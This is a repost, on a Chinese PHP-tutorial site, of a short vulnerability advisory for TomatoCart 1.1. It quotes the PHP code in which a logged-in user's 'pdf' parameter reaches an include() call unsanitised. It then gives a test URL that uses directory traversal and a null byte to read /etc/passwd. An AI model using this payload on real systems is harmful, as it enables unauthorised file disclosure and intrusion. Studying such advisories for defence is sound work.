来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] 标题: TomatoCart 1.1 PostAuth Local File Include作者: brain[pillow]下载地址 http://www.tomatocart.com/影响版本: 1.1缺陷代码分析:if ($osC_Customer-isLoggedOn() === true) { if (isse......
|
标题: TomatoCart 1.1 PostAuth Local File Include 缺陷代码分析: if ($osC_Customer->isLoggedOn() === true) {
if (isset($_REQUEST['module'])) { $module = $_REQUEST['module']; $osC_Language->load($module); } if (isset($_REQUEST['pdf'])) { $pdf = $_REQUEST['pdf']; }
if (!empty($module) && !empty($pdf)) { if (file_exists('includes/modules/pdf/' . $pdf . '.php')) { include('includes/modules/pdf/' . $pdf . '.php');
$pdf_class = 'toC_' .ucfirst($pdf) . '_PDF'; $object = new $pdf_class(); $object ->render();
exit; } } }
========================================================= # 测试方法:
/pdf.php?module=1&pdf=../../../../../../../../../../../../../etc/passwd%00
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
